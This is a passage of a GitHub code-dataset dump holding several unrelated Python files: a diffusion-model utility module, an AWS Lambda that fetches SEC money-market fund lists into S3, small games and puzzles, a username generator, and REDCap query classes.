= d - y\n var_inv = link.inv_variance(z)\n pi = P.dot(u)\n k = pi / (lambda_ + u.dot(pi))\n w = w + eta*k*xi*var_inv\n P = lambda_inv*(P - np.outer(k, u).dot(P))\n else:\n xi = np.nan\n # save state and predictions\n errors[t] = xi\n predictions[t] = y\n estimates[t] = w\n if save_precision:\n precisions[t] = P\n predictions = pd.Series(predictions, index=endog.index)\n errors = pd.Series(errors, index=endog.index)\n estimates = pd.DataFrame(estimates, columns=exog.columns, index=endog.index)\n return ah.PredictionResults(predictions, errors, estimates, precisions)\n","repo_name":"dn3kmc/jair_anomaly_detection","sub_path":"anomaly_detection_methods/glim_method.py","file_name":"glim_method.py","file_ext":"py","file_size_in_byte":6222,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"71180351287","text":"import random\r\n\r\nchoices = ['R', 'P', 'S']\r\nchoice_dict = {'R': 'Rock', 'P': 'Paper', 'S': 'Scissors'}\r\n\r\ndef rps():\r\n user_input = input(\"Pick a choice, [R, P or S]: \")\r\n user_input = user_input.upper()\r\n if user_input not in choices:\r\n print(\"Try again\")\r\n\r\n cpu_pick = random.choice(choices)\r\n print(f\"Player ({choice_dict[user_input]}) : CPU ({choice_dict[cpu_pick]})\")\r\n\r\n if user_input == cpu_pick:\r\n print(\"Tie. Try again\")\r\n return repr(rps())\r\n elif user_input == \"R\":\r\n if cpu_pick == 'S': \r\n return (\"Player wins\")\r\n else:\r\n return (\"CPU wins\")\r\n elif user_input == \"S\":\r\n if cpu_pick == \"P\":\r\n return (\"Player wins\")\r\n else:\r\n return (\"CPU wins\")\r\n elif user_input == \"P\":\r\n if cpu_pick == \"R\":\r\n return (\"Player wins\")\r\n else:\r\n return (\"CPU wins\")\r\n\r\nprint(repr(rps()))","repo_name":"Desmazing/zuri_fullstack","sub_path":"rock_paper_scissors_v2.py","file_name":"rock_paper_scissors_v2.py","file_ext":"py","file_size_in_byte":939,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"4295079159","text":"\"\"\"\nThis code started out as a PyTorch port of Ho et al's diffusion models:\nhttps://github.com/hojonathanho/diffusion/blob/1e0dceb3b3495bbe19116a5e1b3596cd0706c543/diffusion_tf/diffusion_utils_2.py\n\nDocstrings have been added, as well as DDIM sampling and a new collection of beta schedules.\n\"\"\"\n\nimport enum\nimport math\n\nimport numpy as np\nimport torch as th\n\nfrom .nn import mean_flat\nfrom .losses import normal_kl, discretized_gaussian_log_likelihood\n\n\ndef get_named_beta_schedule(schedule_name, num_diffusion_timesteps):\n\n if schedule_name == \"linear\":\n # Linear schedule from Ho et al, extended to work for any number of\n # diffusion steps.\n scale = 1000 / num_diffusion_timesteps\n beta_start = scale * 0.0001\n beta_end = scale * 0.02\n return np.linspace(\n beta_start, beta_end, num_diffusion_timesteps, dtype=np.float64\n )\n elif schedule_name == \"cosine\":\n return betas_for_alpha_bar(\n num_diffusion_timesteps,\n lambda t: math.cos((t + 0.008) / 1.008 * math.pi / 2) ** 2,\n )\n else:\n raise NotImplementedError(f\"unknown beta schedule: {schedule_name}\")\n\n\ndef betas_for_alpha_bar(num_diffusion_timesteps, alpha_bar, max_beta=0.999):\n\n betas = []\n for i in range(num_diffusion_timesteps):\n t1 = i / num_diffusion_timesteps\n t2 = (i + 1) / num_diffusion_timesteps\n betas.append(min(1 - alpha_bar(t2) / alpha_bar(t1), max_beta))\n return np.array(betas)\n\n\nclass ModelMeanType(enum.Enum):\n\n PREVIOUS_X = enum.auto() # the model predicts x_{t-1}\n START_X = enum.auto() # the model predicts x_0\n EPSILON = enum.auto() # the model predicts epsilon\n\n\nclass ModelVarType(enum.Enum):\n\n LEARNED = enum.auto()\n FIXED_SMALL = enum.auto()\n FIXED_LARGE = enum.auto()\n LEARNED_RANGE = enum.auto()\n\n\nclass LossType(enum.Enum):\n MSE = enum.auto() # use raw MSE loss (and KL when learning variances)\n RESCALED_MSE = (\n enum.auto()\n ) # use raw MSE loss (with RESCALED_KL when learning variances)\n KL = enum.auto() # use the variational lower-bound\n RESCALED_KL = enum.auto() # like KL, but rescale to estimate the full VLB\n\n def is_vb(self):\n return self == LossType.KL or self == LossType.RESCALED_KL\n\n\nclass GaussianDiffusion:\n\n def __init__(\n self,\n *,\n betas,\n model_mean_type,\n model_var_type,\n loss_type,\n rescale_timesteps=False,\n ):\n self.model_mean_type = model_mean_type # predict noise or expectation of mean or x_0\n self.model_var_type = model_var_type # learnable or fix\n self.loss_type = loss_type\n self.rescale_timesteps = rescale_timesteps\n\n # Use float64 for accuracy.\n betas = np.array(betas, dtype=np.float64)\n self.betas = betas\n assert len(betas.shape) == 1, \"betas must be 1-D\"\n assert (betas > 0).all() and (betas <= 1).all()\n\n self.num_timesteps = int(betas.shape[0])\n\n alphas = 1.0 - betas\n self.alphas_cumprod = np.cumprod(alphas, axis=0)\n self.alphas_cumprod_prev = np.append(1.0, self.alphas_cumprod[:-1])\n self.alphas_cumprod_next = np.append(self.alphas_cumprod[1:], 0.0)\n assert self.alphas_cumprod_prev.shape == (self.num_timesteps,)\n\n # calculations for diffusion q(x_t | x_{t-1}) and others\n self.sqrt_alphas_cumprod = np.sqrt(self.alphas_cumprod)\n self.sqrt_one_minus_alphas_cumprod = np.sqrt(1.0 - self.alphas_cumprod)\n self.log_one_minus_alphas_cumprod = np.log(1.0 - self.alphas_cumprod)\n self.sqrt_recip_alphas_cumprod = np.sqrt(1.0 / self.alphas_cumprod)\n self.sqrt_recipm1_alphas_cumprod = np.sqrt(1.0 / self.alphas_cumprod - 1)\n\n # calculations for posterior q(x_{t-1} | x_t, x_0)\n self.posterior_variance = (\n betas * (1.0 - self.alphas_cumprod_prev) / (1.0 - self.alphas_cumprod)\n )\n # log calculation clipped because the posterior variance is 0 at the\n # beginning of the diffusion chain.\n self.posterior_log_variance_clipped = np.log(\n np.append(self.posterior_variance[1], self.posterior_variance[1:])\n )\n self.posterior_mean_coef1 = (\n betas * np.sqrt(self.alphas_cumprod_prev) / (1.0 - self.alphas_cumprod)\n )\n self.posterior_mean_coef2 = (\n (1.0 - self.alphas_cumprod_prev)\n * np.sqrt(alphas)\n / (1.0 - self.alphas_cumprod)\n )\n\n def q_mean_variance(self, x_start, t): # q-True distribution\n\n mean = (\n _extract_into_tensor(self.sqrt_alphas_cumprod, t, x_start.shape) * x_start\n )\n variance = _extract_into_tensor(1.0 - self.alphas_cumprod, t, x_start.shape)\n log_variance = _extract_into_tensor(\n self.log_one_minus_alphas_cumprod, t, x_start.shape\n )\n return mean, variance, log_variance\n\n def q_sample(self, x_start, t, noise=None):\n\n if noise is None:\n noise = th.randn_like(x_start)\n assert noise.shape == x_start.shape\n return (\n _extract_into_tensor(self.sqrt_alphas_cumprod, t, x_start.shape) * x_start\n + _extract_into_tensor(self.sqrt_one_minus_alphas_cumprod, t, x_start.shape)\n * noise\n )\n\n def q_posterior_mean_variance(self, x_start, x_t, t):\n\n assert x_start.shape == x_t.shape\n posterior_mean = (\n _extract_into_tensor(self.posterior_mean_coef1, t, x_t.shape) * x_start\n + _extract_into_tensor(self.posterior_mean_coef2, t, x_t.shape) * x_t\n )\n posterior_variance = _extract_into_tensor(self.posterior_variance, t, x_t.shape)\n posterior_log_variance_clipped = _extract_into_tensor(\n self.posterior_log_variance_clipped, t, x_t.shape\n )\n assert (\n posterior_mean.shape[0]\n == posterior_variance.shape[0]\n == posterior_log_variance_clipped.shape[0]\n == x_start.shape[0]\n )\n return posterior_mean, posterior_variance, posterior_log_variance_clipped\n\n def p_mean_variance( ### get mean and var using in reverse process\n self, model, x, t, clip_denoised=True, denoised_fn=None, model_kwargs=None\n ):\n\n if model_kwargs is None:\n model_kwargs = {}\n\n B, C = x.shape[:2]\n assert t.shape == (B,)\n\n model_output = model(x, self._scale_timesteps(t), **model_kwargs)\n\n if self.model_var_type in [ModelVarType.LEARNED, ModelVarType.LEARNED_RANGE]:\n assert model_output.shape == (B, C * 2, *x.shape[2:])\n model_output, model_var_values = th.split(model_output, C, dim=1)\n if self.model_var_type == ModelVarType.LEARNED:\n model_log_variance = model_var_values\n model_variance = th.exp(model_log_variance)\n else:\n min_log = _extract_into_tensor(\n self.posterior_log_variance_clipped, t, x.shape\n )\n max_log = _extract_into_tensor(np.log(self.betas), t, x.shape)\n # The model_var_values is [-1, 1] for [min_var, max_var].\n frac = (model_var_values + 1) / 2\n model_log_variance = frac * max_log + (1 - frac) * min_log\n model_variance = th.exp(model_log_variance)\n else:\n model_variance, model_log_variance = {\n # for fixedlarge, we set the initial (log-)variance like so\n # to get a better decoder log likelihood.\n ModelVarType.FIXED_LARGE: (\n np.append(self.posterior_variance[1], self.betas[1:]),\n np.log(np.append(self.posterior_variance[1], self.betas[1:])),\n ),\n ModelVarType.FIXED_SMALL: (\n self.posterior_variance,\n self.posterior_log_variance_clipped,\n ),\n }[self.model_var_type]\n model_variance = _extract_into_tensor(model_variance, t, x.shape)\n model_log_variance = _extract_into_tensor(model_log_variance, t, x.shape)\n\n def process_xstart(x):\n if denoised_fn is not None:\n x = denoised_fn(x)\n if clip_denoised:\n return x.clamp(-1, 1)\n return x\n\n if self.model_mean_type == ModelMeanType.PREVIOUS_X:\n pred_xstart = process_xstart(\n self._predict_xstart_from_xprev(x_t=x, t=t, xprev=model_output)\n )\n model_mean = model_output\n elif self.model_mean_type in [ModelMeanType.START_X, ModelMeanType.EPSILON]:\n if self.model_mean_type == ModelMeanType.START_X:\n pred_xstart = process_xstart(model_output)\n else:\n pred_xstart = process_xstart(\n self._predict_xstart_from_eps(x_t=x, t=t, eps=model_output)\n )\n model_mean, _, _ = self.q_posterior_mean_variance(\n x_start=pred_xstart, x_t=x, t=t\n )\n else:\n raise NotImplementedError(self.model_mean_type)\n\n assert (\n model_mean.shape == model_log_variance.shape == pred_xstart.shape == x.shape\n )\n return {\n \"mean\": model_mean,\n \"variance\": model_variance,\n \"log_variance\": model_log_variance,\n \"pred_xstart\": pred_xstart,\n }\n\n def _predict_xstart_from_eps(self, x_t, t, eps):\n assert x_t.shape == eps.shape\n return (\n _extract_into_tensor(self.sqrt_recip_alphas_cumprod, t, x_t.shape) * x_t\n - _extract_into_tensor(self.sqrt_recipm1_alphas_cumprod, t, x_t.shape) * eps\n )\n\n def _predict_xstart_from_xprev(self, x_t, t, xprev):\n assert x_t.shape == xprev.shape\n return ( # (xprev - coef2*x_t) / coef1\n _extract_into_tensor(1.0 / self.posterior_mean_coef1, t, x_t.shape) * xprev\n - _extract_into_tensor(\n self.posterior_mean_coef2 / self.posterior_mean_coef1, t, x_t.shape\n )\n * x_t\n )\n\n def _predict_eps_from_xstart(self, x_t, t, pred_xstart):\n\n return (\n _extract_into_tensor(self.sqrt_recip_alphas_cumprod, t, x_t.shape) * x_t\n - pred_xstart\n ) / _extract_into_tensor(self.sqrt_recipm1_alphas_cumprod, t, x_t.shape)\n\n def _scale_timesteps(self, t):\n if self.rescale_timesteps:\n return t.float() * (1000.0 / self.num_timesteps)\n return t\n\n def condition_mean(self, cond_fn, p_mean_var, x, t, model_kwargs=None):\n\n gradient = cond_fn(x, self._scale_timesteps(t), **model_kwargs)\n new_mean = (\n p_mean_var[\"mean\"].float() + p_mean_var[\"variance\"] * gradient.float()\n )\n return new_mean\n\n def condition_score(self, cond_fn, p_mean_var, x, t, model_kwargs=None):\n\n alpha_bar = _extract_into_tensor(self.alphas_cumprod, t, x.shape)\n\n eps = self._predict_eps_from_xstart(x, t, p_mean_var[\"pred_xstart\"])\n eps = eps - (1 - alpha_bar).sqrt() * cond_fn(\n x, self._scale_timesteps(t), **model_kwargs\n )\n\n out = p_mean_var.copy()\n out[\"pred_xstart\"] = self._predict_xstart_from_eps(x, t, eps)\n out[\"mean\"], _, _ = self.q_posterior_mean_variance(\n x_start=out[\"pred_xstart\"], x_t=x, t=t\n )\n return out\n\n def p_sample(\n self,\n model,\n x,\n t,\n clip_denoised=True,\n denoised_fn=None,\n cond_fn=None,\n model_kwargs=None,\n ):\n\n out = self.p_mean_variance(\n model,\n x,\n t,\n clip_denoised=clip_denoised,\n denoised_fn=denoised_fn,\n model_kwargs=model_kwargs,\n )\n noise = th.randn_like(x)\n nonzero_mask = (\n (t != 0).float().view(-1, *([1] * (len(x.shape) - 1)))\n ) # no noise when t == 0\n if cond_fn is not None:\n out[\"mean\"] = self.condition_mean(\n cond_fn, out, x, t, model_kwargs=model_kwargs\n )\n sample = out[\"mean\"] + nonzero_mask * th.exp(0.5 * out[\"log_variance\"]) * noise\n return {\"sample\": sample, \"pred_xstart\": out[\"pred_xstart\"]}\n\n def p_sample_loop(\n self,\n model,\n shape,\n noise=None,\n clip_denoised=True,\n denoised_fn=None,\n cond_fn=None,\n model_kwargs=None,\n device=None,\n progress=False,\n ):\n final = None\n\n for sample in self.p_sample_loop_progressive(\n model,\n shape,\n noise=noise,\n clip_denoised=clip_denoised,\n denoised_fn=denoised_fn,\n cond_fn=cond_fn,\n model_kwargs=model_kwargs,\n device=device,\n progress=progress,\n ):\n final = sample\n return final[\"sample\"]\n\n def p_sample_loop_progressive(\n self,\n model,\n shape,\n noise=None,\n clip_denoised=True,\n denoised_fn=None,\n cond_fn=None,\n model_kwargs=None,\n device=None,\n progress=False,\n ):\n\n if device is None:\n device = next(model.parameters()).device\n assert isinstance(shape, (tuple, list))\n if noise is not None:\n img = noise\n else:\n img = th.randn(*shape, device=device)\n indices = list(range(self.num_timesteps))[::-1]\n\n if progress:\n # Lazy import so that we don't depend on tqdm.\n from tqdm.auto import tqdm\n\n indices = tqdm(indices)\n\n\n for i in indices:\n t = th.tensor([i] * shape[0], device=device)\n with th.no_grad():\n out = self.p_sample(\n model,\n img,\n t,\n clip_denoised=clip_denoised,\n denoised_fn=denoised_fn,\n cond_fn=cond_fn,\n model_kwargs=model_kwargs,\n )\n yield out\n img = out[\"sample\"]\n\n def ddim_sample(\n self,\n model,\n x,\n t,\n clip_denoised=True,\n denoised_fn=None,\n cond_fn=None,\n model_kwargs=None,\n eta=0.0,\n ):\n\n out = self.p_mean_variance(\n model,\n x,\n t,\n clip_denoised=clip_denoised,\n denoised_fn=denoised_fn,\n model_kwargs=model_kwargs,\n )\n if cond_fn is not None:\n out = self.condition_score(cond_fn, out, x, t, model_kwargs=model_kwargs)\n\n # Usually our model outputs epsilon, but we re-derive it\n # in case we used x_start or x_prev prediction.\n eps = self._predict_eps_from_xstart(x, t, out[\"pred_xstart\"])\n\n alpha_bar = _extract_into_tensor(self.alphas_cumprod, t, x.shape)\n alpha_bar_prev = _extract_into_tensor(self.alphas_cumprod_prev, t, x.shape)\n sigma = (\n eta\n * th.sqrt((1 - alpha_bar_prev) / (1 - alpha_bar))\n * th.sqrt(1 - alpha_bar / alpha_bar_prev)\n )\n # Equation 12.\n noise = th.randn_like(x)\n mean_pred = (\n out[\"pred_xstart\"] * th.sqrt(alpha_bar_prev)\n + th.sqrt(1 - alpha_bar_prev - sigma ** 2) * eps\n )\n nonzero_mask = (\n (t != 0).float().view(-1, *([1] * (len(x.shape) - 1)))\n ) # no noise when t == 0\n sample = mean_pred + nonzero_mask * sigma * noise\n return {\"sample\": sample, \"pred_xstart\": out[\"pred_xstart\"]}\n\n def ddim_sample_loop(\n self,\n model,\n shape,\n noise=None,\n clip_denoised=True,\n denoised_fn=None,\n cond_fn=None,\n model_kwargs=None,\n device=None,\n progress=False,\n eta=0.0,\n ):\n\n final = None\n\n for sample in self.ddim_sample_loop_progressive(\n model,\n shape,\n noise=noise,\n clip_denoised=clip_denoised,\n denoised_fn=denoised_fn,\n cond_fn=cond_fn,\n model_kwargs=model_kwargs,\n device=device,\n progress=progress,\n eta=eta,\n ):\n final = sample\n return final[\"sample\"]\n\n def ddim_sample_loop_progressive(\n self,\n model,\n shape,\n noise=None,\n clip_denoised=True,\n denoised_fn=None,\n cond_fn=None,\n model_kwargs=None,\n device=None,\n progress=False,\n eta=0.0,\n ):\n\n if device is None:\n device = next(model.parameters()).device\n assert isinstance(shape, (tuple, list))\n if noise is not None:\n img = noise\n else:\n img = th.randn(*shape, device=device)\n indices = list(range(self.num_timesteps))[::-1]\n\n if progress:\n # Lazy import so that we don't depend on tqdm.\n from tqdm.auto import tqdm\n\n indices = tqdm(indices)\n\n for i in indices:\n t = th.tensor([i] * shape[0], device=device)\n with th.no_grad():\n out = self.ddim_sample(\n model,\n img,\n t,\n clip_denoised=clip_denoised,\n denoised_fn=denoised_fn,\n cond_fn=cond_fn,\n model_kwargs=model_kwargs,\n eta=eta,\n )\n yield out\n img = out[\"sample\"]\n\n def _vb_terms_bpd(\n self, model, x_start, x_t, t, clip_denoised=True, model_kwargs=None\n ):\n\n true_mean, _, true_log_variance_clipped = self.q_posterior_mean_variance(\n x_start=x_start, x_t=x_t, t=t\n )\n out = self.p_mean_variance(\n model, x_t, t, clip_denoised=clip_denoised, model_kwargs=model_kwargs\n )\n kl = normal_kl(\n true_mean, true_log_variance_clipped, out[\"mean\"], out[\"log_variance\"]\n )\n kl = mean_flat(kl) / np.log(2.0)\n\n decoder_nll = -discretized_gaussian_log_likelihood(\n x_start, means=out[\"mean\"], log_scales=0.5 * out[\"log_variance\"]\n )\n assert decoder_nll.shape == x_start.shape\n decoder_nll = mean_flat(decoder_nll) / np.log(2.0)\n\n # At the first timestep return the decoder NLL,\n # otherwise return KL(q(x_{t-1}|x_t,x_0) || p(x_{t-1}|x_t))\n output = th.where((t == 0), decoder_nll, kl)\n return {\"output\": output, \"pred_xstart\": out[\"pred_xstart\"]}\n\n def training_losses(self, model, x_start, t, model_kwargs=None, noise=None):\n\n if model_kwargs is None:\n model_kwargs = {}\n if noise is None:\n noise = th.randn_like(x_start)\n x_t = self.q_sample(x_start, t, noise=noise)\n\n terms = {}\n\n if self.loss_type == LossType.KL or self.loss_type == LossType.RESCALED_KL:\n terms[\"loss\"] = self._vb_terms_bpd(\n model=model,\n x_start=x_start,\n x_t=x_t,\n t=t,\n clip_denoised=False,\n model_kwargs=model_kwargs,\n )[\"output\"]\n if self.loss_type == LossType.RESCALED_KL:\n terms[\"loss\"] *= self.num_timesteps\n elif self.loss_type == LossType.MSE or self.loss_type == LossType.RESCALED_MSE:\n model_output = model(x_t, self._scale_timesteps(t), **model_kwargs)\n\n if self.model_var_type in [\n ModelVarType.LEARNED,\n ModelVarType.LEARNED_RANGE,\n ]:\n B, C = x_t.shape[:2]\n assert model_output.shape == (B, C * 2, *x_t.shape[2:])\n model_output, model_var_values = th.split(model_output, C, dim=1)\n # Learn the variance using the variational bound, but don't let\n # it affect our mean prediction.\n frozen_out = th.cat([model_output.detach(), model_var_values], dim=1)\n terms[\"vb\"] = self._vb_terms_bpd(\n model=lambda *args, r=frozen_out: r,\n x_start=x_start,\n x_t=x_t,\n t=t,\n clip_denoised=False,\n )[\"output\"]\n if self.loss_type == LossType.RESCALED_MSE:\n # Divide by 1000 for equivalence with initial implementation.\n # Without a factor of 1/1000, the VB term hurts the MSE term.\n terms[\"vb\"] *= self.num_timesteps / 1000.0\n\n target = {\n ModelMeanType.PREVIOUS_X: self.q_posterior_mean_variance(\n x_start=x_start, x_t=x_t, t=t\n )[0],\n ModelMeanType.START_X: x_start,\n ModelMeanType.EPSILON: noise,\n }[self.model_mean_type]\n assert model_output.shape == target.shape == x_start.shape\n terms[\"mse\"] = mean_flat((target - model_output) ** 2)\n if \"vb\" in terms:\n terms[\"loss\"] = terms[\"mse\"] + terms[\"vb\"]\n else:\n terms[\"loss\"] = terms[\"mse\"]\n else:\n raise NotImplementedError(self.loss_type)\n\n return terms\n\ndef _extract_into_tensor(arr, timesteps, broadcast_shape):\n\n res = th.from_numpy(arr).to(device=timesteps.device)[timesteps].float()\n while len(res.shape) < len(broadcast_shape):\n res = res[..., None]\n return res.expand(broadcast_shape)\n","repo_name":"Hxyz-123/Font-diff","sub_path":"utils/gaussian_diffusion.py","file_name":"gaussian_diffusion.py","file_ext":"py","file_size_in_byte":21610,"program_lang":"python","lang":"en","doc_type":"code","stars":71,"dataset":"github-code","pt":"76"} +{"seq_id":"12388904628","text":"#!/usr/bin/python3\ndef find_anagrams(str1, str2):\n \"\"\" Check if a word is an anagrams \"\"\"\n # converts the strings to lower case\n str1.lower()\n str2.lower()\n # check if length is same\n if (len(str1) == len(str2)):\n\n # sort the strings\n sorted_str1 = sorted(str1)\n sorted_str2 = sorted(str2)\n\n # if sorted char arrays are same\n if (sorted_str1 == sorted_str2):\n return True\n else:\n return False\n\n else:\n return False\n\nprint(find_anagrams(\"hello\", \"yello\"))\nprint(find_anagrams(\"race\", \"care\"))\nprint(find_anagrams(\"race\", \"caring\"))","repo_name":"baebeekay/pythonProject","sub_path":"anagram.py","file_name":"anagram.py","file_ext":"py","file_size_in_byte":622,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"12859810580","text":"from __future__ import print_function\nimport pandas as pd\nimport boto3\nfrom datetime import date\nimport base64\n\ns3_client = boto3.client('s3')\ns3 = boto3.resource('s3')\nsns_client = boto3.client('sns')\ntopic_arn = 'arn:aws:sns:eu-central-1:540666357414:fundmapper'\nbucket_name = \"fundmapper\"\nprefix = \"01-MMFLists/\"\n\n\ndef lambda_handler(event, context):\n today = date.today()\n mdate = today.strftime(\"%Y-%m\")\n #mdate = \"2020-11\"\n bucket = s3.Bucket(bucket_name)\n objs = list(bucket.objects.filter(Prefix=prefix))\n\n # test whether file is already processed\n for obj in objs:\n if obj.key == prefix + \"mmf-\" + mdate + \".csv\":\n sns_client.publish(TopicArn=topic_arn,\n Message=\"Found a new list, mmf-\" + mdate + \".csv processed: was already downloaded\",\n Subject='This months files is already there')\n return \"File already present\"\n\n print(\"Not stored yet; try to download\")\n\n # download new file and store to s3\n try:\n # read from SEC website\n df = pd.read_csv(\n \"https://www.sec.gov/files/investment/data/other/money-market-fund-information/mmf-\" + mdate + \".csv\")\n\n # save vector of IDs\n ids = set(df.series_id.tolist())\n\n # store locally\n df.to_csv('/tmp/mmf-\"+mdate+\".csv')\n\n # save new version to S3\n s3_client.upload_file('/tmp/mmf-\"+mdate+\".csv', bucket_name, prefix + \"mmf-\" + mdate + \".csv\")\n\n # send message\n sns_client.publish(TopicArn=topic_arn,\n Message=\"Found a new list, mmf-\" + mdate + \".csv; processed and downloaded\",\n Subject='Downloaded new report')\n\n # read existing ids\n series_ids = s3.get_object(Bucket=bucket_name, Key=\"series_ids.csv\")\n series_ids = set(pd.read_csv(series_ids['Body']).series_ids.tolist())\n n_oldids = len(series_ids)\n series_ids = series_ids.union(ids)\n\n if len(series_ids) > n_oldids:\n # prepare a new file to be saved\n series_ids = pd.DataFrame({\"series_ids\": list(series_ids)})\n\n # store locally\n series_ids.to_csv(\"/tmp/series_ids.csv\")\n\n # upload to S3\n s3_client.upload_file(\"/tmp/series_ids.csv\", bucket_name, \"series_ids.csv\")\n sns_client.publish(TopicArn=topic_arn,\n Message=\"Found a new list, mmf-\" + mdate + \".csv; processed and downloaded and a new ID is found.\",\n Subject='A new fund was found!')\n\n\n except:\n print(\"None found\")\n\n return \"Success \"\n\n\n","repo_name":"JannicCutura/fundmappeR","sub_path":"lambda/downloadMMFLists/lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":2648,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"76"} +{"seq_id":"33249273450","text":"# Done at 10/6/2018. Another username generator.\"test2\" is a good reference that its in the same idea as our old \"test\".\nimport random\nimport os\nprint(\"@cokz Usernames Generator!\")\nprint(\"Your Working directory is \" + os.getcwd())\nusers_to_generate = (\"abcdefghijklmnopqrstuvwxyz0123456789_\")\ni = 0\nsave = ['']\nuserinput = int(input(\"USERS AMOUNT:\"))\nuserinput2 = int(input(\"Enter The Length of The Username:\"))\nwhile userinput != i:\n i = i + 1\n a = random.choices(users_to_generate, k=int(userinput2))\n save += a + '\\n'\n print(''.join(a))\nuser_choice = input(\"Do You Want To Save it?\\n[Y/N} \")\nif user_choice == \"y\":\n file = open(\"Output.txt\", \"w\")\n file.write(str(save))\n file.close()\n print(\"Done!\")\nif user_choice == \"n\":\n print(\"Okay Have a Nice Day!\")","repo_name":"amjad-developer/Random-Scripts","sub_path":"Test2.py","file_name":"Test2.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"72587542324","text":"import operator as op\nimport time\n\n\nclass Query(object):\n \"\"\"Main class abstracting one single query\"\"\"\n cmp_map = {'eq': op.eq, 'ne': op.ne, 'gt': op.gt, 'ge': op.ge, 'le': op.le,\n 'lt': op.lt}\n\n def __init__(self, field_name, comparisons, qtype='number'):\n \"\"\" Constructor\n\n Parameters\n ----------\n field_name: str\n string corresponding to the field for comparisons\n comparisons: dict\n each key is a \"verb\" from the following:\n 'eq', 'ne', 'le', 'lt', 'ge', 'gt'\n and value is the value of the comparison\n qtype: 'number' | 'integer' | 'date_ymd'\n The assumed type of data for this field_name. Values are casted\n based on this.\n \"\"\"\n self.fname = field_name\n self.cmps = comparisons\n for k, _ in self.cmps.items():\n if k not in self.cmp_map:\n raise ValueError(\"Bad comparison verb in constructor\")\n self.type = qtype\n\n def __str__(self):\n \"\"\"How to print Queries\"\"\"\n log = ' AND '.join(['%s:%s' % (comp, v) for\n comp, v in self.cmps.items()])\n return '%s %s' % (self.fname, log)\n\n def filter(self, data, return_key, qtype=''):\n \"\"\" Filter the data through this Query\n\n Parameters\n ----------\n data: seq of dicts\n assumed that each dict contains a key of the Query's field name\n return_key: dict key\n assumed that each dict also contains this key\n this key exists in the list of returned dicts\n \"\"\"\n if qtype:\n typ = qtype\n else:\n typ = self.type\n if typ in ('number', 'integer'):\n xfm = float\n elif typ == 'date_ymd':\n xfm = lambda x: time.strptime(x, '%Y-%m-%d')\n elif typ == 'email':\n raise ValueError(\"WHY ARE YOU SEARCHING BY EMAIL?\")\n else:\n xfm = str\n match = []\n if data:\n sets = []\n for comp, raw_val in self.cmps.items():\n val = xfm(raw_val)\n mat = []\n for row in data:\n try:\n new_val = xfm(row[self.fname])\n except ValueError: # probably an empty cell\n pass\n else:\n match = self.cmp_map[comp](new_val, val)\n if match: # comparison is true\n mat.append(row[return_key])\n sets.append(set(mat))\n match = list(reduce(lambda a, b: a.intersection(b), sets))\n return match\n\n def fields(self):\n \"\"\" Query and QueryGroup both respond to this method\"\"\"\n return [self.fname]\n\n\nclass QueryGroup(object):\n \"\"\"Class to hold one or more Querys (or QueryGroups!)\"\"\"\n\n def __init__(self, query):\n \"\"\" Constructor\n\n Parameters\n ----------\n query: Query | QueryGroup\n first query object\n \"\"\"\n self.queries = [query]\n self.logic = []\n self.index = 0\n self.total = 1\n\n def __str__(self):\n \"\"\"Print a QueryGroup\"\"\"\n all_logic = self.logic[:]\n if len(self.queries) > 1:\n log = ''\n # Because there's one less logic verb than queries\n all_logic.append('')\n for qry, logic in zip(self.queries, all_logic):\n if isinstance(qry, QueryGroup):\n fmt = '(%s %s) '\n else:\n fmt = '%s %s '\n log += fmt % (qry.__str__(), logic)\n return log\n else:\n return self.queries[0].__str__()\n\n def add_query(self, query, logic='AND'):\n \"\"\"Add a query to the group\n\n Parameters\n ----------\n query: Query | QueryGroup\n query to add\n logic: 'AND' | 'OR'\n logic connecting this query to the last\n \"\"\"\n self.queries.append(query)\n if logic.upper() not in ('AND', 'OR'):\n raise ValueError('Queries can only be connectd with AND | OR')\n self.logic.append(logic)\n self.total += 1\n\n def __iter__(self):\n \"\"\" So QueryGroup is an iterator\"\"\"\n return self\n\n def next(self):\n \"\"\" So we can loop through a QueryGroup \"\"\"\n if self.index == self.total:\n raise StopIteration\n next_q = self.queries[self.index]\n self.index = self.index + 1\n return next_q\n\n def fields(self):\n \"\"\"Returns a list of keys of all the field names referenced by the\n queries in the group\"\"\"\n keys = []\n for qry in self.queries:\n fields = qry.fields()\n keys.extend(fields)\n return keys\n\n def filter(self, data, return_key):\n \"\"\" Filter for the query group \"\"\"\n match = []\n for i, qry in enumerate(self.queries):\n temp_match = set(qry.filter(data, return_key))\n if i == 0:\n # first, set match == to set\n match = temp_match\n else:\n logic = self.logic[i - 1]\n if logic == 'AND':\n match = match & temp_match\n else:\n match = match | temp_match\n return list(match)\n","repo_name":"Varadharajan88/PyCapNoSSL","sub_path":"redcap/query.py","file_name":"query.py","file_ext":"py","file_size_in_byte":5399,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"23934274197","text":"def swap(mix, curr_pos, mix_pos):\n if curr_pos == mix_pos:\n return mix\n elif curr_pos < mix_pos:\n before_item = mix[:curr_pos]\n after_item = mix[curr_pos+1:]\n before_move = after_item[:mix_pos-curr_pos]\n after_move = after_item[mix_pos-curr_pos:]\n return before_item + before_move + [mix[curr_pos]] + after_move\n else:\n before_item = mix[:curr_pos]\n after_item = mix[curr_pos+1:]\n before_move = before_item[:mix_pos]\n after_move = before_item[mix_pos:]\n return before_move + [mix[curr_pos]] + after_move + after_item\n\nif __name__ == '__main__':\n with open('input', 'r') as f:\n content = f.read()\n\n num = [int(n) for n in content.split('\\n') if n.strip() != \"\"]\n res = [n * 811589153 for n in num]\n idx = list(range(len(num)))\n for _ in range(10):\n for i in range(len(idx)):\n curr_pos = idx.index(i)\n n = res[curr_pos]\n if n == 0:\n mix_pos = curr_pos\n else:\n mix_pos = (curr_pos + n) % (len(res) - 1)\n if mix_pos == 0:\n mix_pos = len(res) - 1\n idx = swap(idx, curr_pos, mix_pos)\n res = swap(res, curr_pos, mix_pos)\n\n i = res.index(0)\n coord = [\n res[(i + 1000) % len(res)],\n res[(i + 2000) % 